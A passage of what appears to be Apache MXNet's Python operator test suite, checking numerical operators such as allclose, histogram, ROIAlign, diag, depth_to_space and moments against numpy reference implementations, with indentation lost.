tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
                    # Prepare a report of the array elements this side considers "not close", together
                    # with the corresponding elements of the comparison CPU/GPU/Python vectors considered "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
                    # Find the indices of all violations and the corresponding coordinate values
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
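# Sketch (hypothetical helper, not part of the original suite): the violation
# test used in allclose_function mirrors numpy's criterion, which treats a and
# b as close when |a - b| <= atol + rtol * |b|.
def _demo_allclose_criterion(a=1.0, b=1.00002, rtol=1e-5, atol=1e-8):
    manual = abs(a - b) <= atol + rtol * abs(b)
    assert manual == np.allclose(a, b, rtol=rtol, atol=atol)
    return manual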
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1._bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2._bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
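# Sketch (hypothetical helper, not part of the original tests): the same
# ravel/unravel roundtrip can be expressed in pure numpy, with one column of
# coordinates per point.
def _demo_ravel_roundtrip():
    shape = (3, 4, 5)
    coords = np.array([[2, 0, 1], [3, 1, 0], [4, 2, 3]])
    flat = np.ravel_multi_index(coords, shape)
    assert (np.stack(np.unravel_index(flat, shape)) == coords).all()
    return flat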
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
        # Note: the test runs on both GPU and CPU hosts, so we cannot assert
        # a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA is sometimes unable to determine the
        # number of GPUs
if str(e).find("CUDA") == -1:
raise e
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
    # Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
    # k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
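# Illustrative note, not part of the original test: for a single sample with
# softmax output p = [0.7, 0.3] and one-hot label [1, 0], the f_sm_ce formula
# above reduces to -log(0.7) ~= 0.357. The helper name below is hypothetical.
def _example_softmax_cross_entropy():
    p = np.array([0.7, 0.3])
    one_hot = np.array([1.0, 0.0])
    return float(np.sum(-np.log(p) * one_hot))  # == -log(0.7)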
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
